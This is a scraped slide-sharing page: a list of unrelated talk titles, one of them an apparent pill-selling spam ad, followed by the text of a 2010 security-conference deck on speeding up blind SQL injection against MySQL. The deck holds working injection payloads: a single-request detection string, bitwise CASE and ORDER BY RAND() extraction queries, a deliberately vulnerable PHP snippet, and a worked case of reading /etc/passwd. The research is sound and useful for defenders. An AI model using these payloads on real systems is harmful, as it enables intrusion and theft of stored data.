Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 

Harder Faster Stronger

  • 2. SELECT user FROM mysql.user LIMIT 2 • Security consultants working for Securus Global in Melbourne • Have done/are doing a lot a web pentesting • Research focus on web security: – Web Attacks – Web Application Scanners (WAS) testing – Web Application Firewall (WAF) testing – (In)Secure coding
  • 3. Why do we want to optimize SQL injections? • Stealth • Retrieving a large amount of data • Being faster • Because you’re bored using sqlmap • Because it’s fun
  • 4. What can be optimized? • Length of the injection • Number of requests to retrieve information – Optimize retrieval strategy – Optimizations on information
  • 5. Reducing injection length (MySQL) • SUBSTR() instead of SUBSTRING() • MID() instead of SUBSTR() • Using CRC32() – Instead of using the long string you replace it with the CRC32
  • 6. Reducing injection length (MySQL) • SELECT@@version instead of SELECT VERSION() • &&1 instead of AND 1=1 • &1 instead of &&1 • ||1 instead of OR 1=1 • |1 instead of ||1 (fails for NULL|1)
  • 7. Reducing injection length (MySQL) • !id instead of id=0 • > instead of <= (don’t forget to swap the
  • 8. String Retrieval • LENGTH('admin') = 5 – 5 * 7 bits = 35 requests • LENGTH(COMPRESS('admin')) = 17 – 17 * 7 bits = 119 requests
  • 9. Original vs Compressed • Based on CVE allitems.txt – about 47,000 VARCHAR(1000) SELECT ROUND(AVG( LENGTH(COMPRESS(SUBSTRING( text,1,N ))) )) FROM texts
  • 10.
  • 11.
  • 12. How to get 80 characters? SELECT COMPRESS(CONCAT_WS(':', id,name,age,address,password )) FROM users SELECT GROUP_CONCAT(user,password) FROM users; • 1024 Character limit
  • 13. Hash Retrieval • LENGTH(MD5('X')) = 32 – 32 * 7 bits = 224 requests • LENGTH(COMPRESS(MD5('X')) = 44 – 44 * 7 bits = 308 requests
  • 14. Hash Retrieval • Hash keyspace [0-9a-f] • LENGTH(UNHEX(MD5(‘X’))) = 16 – Need to retrieve all 8 bits – 16 x 8 bits = 128 requests
  • 15. Integer Retrieval • “131” → 3 x 7bits • 131 → 8 bits • Dichotomy search • Use CONV()
  • 16. Improving Detection • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • AND 1=0 --’ AND 1=0 --” AND 1=0 -- • Really good payload to detect SQL injection in one request
  • 18. Using Markov • Given the current characters what is the next character most likely going to be • Learning from a list of table names, column names and data to get a model of the data • For each request check if the character is the one predicted before trying to retrieve his 7 bits
  • 19. Tree • Based on the information already retrieved guess the next characters • For example if I already retrieved RUX, the next character is likely to be C … for RUXCON • And if you don’t have anything in your tree matching, you can use markov
  • 22. Guessing process • You already have “RU”
  • 23. Statistics • No optimisation: 3345 • Markov: 3102 • Markov + Lowercase: 3006 • Markov + Lowercase + Tree: 1166 • Updating the tree when retrieving information can be used as well, but not always effective
  • 25. Vulnerability … $o = $_GET['order']; $sql = 'SELECT * FROM users'; $sql .= 'ORDER BY '; $sql .= mysql_real_escape_string($o); $result = mysql_sql($sql); …
  • 26. Exploitation • Slow brute force: – Blindly check each character against the alphabet • A bit better: IF (ASCII(substring((select @@version),1,1))&1, id, name) IF (ASCII(substring((select @@version),1,1))&2, id, name) IF (ASCII(substring((select @@version),1,1))&4, id, name) IF (ASCII(substring((select @@version),1,1))&8, id, name) IF (ASCII(substring((select @@version),1,1))&16, id, name) IF (ASCII(substring((select @@version),1,1))&32, id, name) IF (ASCII(substring((select @@version),1,1))&64, id, name) IF (ASCII(substring((select @@version),2,1))&1, id, name)
  • 27. Exploitation • Blind SQLi: 2 states • We can do better... – Let say we have 4 columns: => 4 states – order by can sort by multiple columns: “order by firstname, lastname” => more states (8 if lucky) – Color Blind SQLi (copyright Nicolas Collignon)
  • 28. Exploitation • For each combinations of order by: – fingerprint the response (with cast for id) – md5 for global warming • SQL has a case statement: CASE (ASCII(substring((select @@version),1,1))&4) WHEN 0 then column1 WHEN 1 then column2 WHEN 2 then column3 WHEN 3 then column4 END
  • 29. Exploitation ## Retrieving ----XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC © Securus Global 2010
  • 30. Exploitation SELECT id,username FROM users id username 1 admin 2 moderator 3 guest
  • 31. Exploitation SELECT id,username FROM users ORDER BY RAND() id username 2 moderator 1 admin 3 guest
  • 32. Exploitation SELECT id,username FROM users ORDER BY RAND() id username 3 guest 2 moderator 1 admin
  • 33. Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
  • 34. Exploitation SELECT id,username FROM users ORDER BY RAND(1) id username 3 guest 1 admin 2 moderator
  • 35. Exploitation RAND seed Order of id 0 1,2,3 1 3,1,2 2 2,3,1 3 3,2,1 4 1,2,3
  • 36. Exploitation RAND seed Order of id Bits 0 1,2,3 00 1 3,1,2 01 2 2,3,1 10 3 3,2,1 11
  • 37. Exploitation RAND( CONV( CONCAT( IF((true/false),0,1), IF((true/false),0,1) ) ,2,10 ) )
  • 39. Statistics Rows Bits 2-6 1 7 5 8 5 9 9 10 11 11 12 12 13 13 17
  • 40. Real World Scenario • 7 rows • Can retrieve 5 bits per request • 1830 characters (14640 bits) in /etc/passwd • Retrieve with 2930 requests • 740 characters for compressed /etc/passwd • Retrieved with 1186 requests
  • 41.
  • 42. Source available tomorrow at: https://github.com/lukejahnke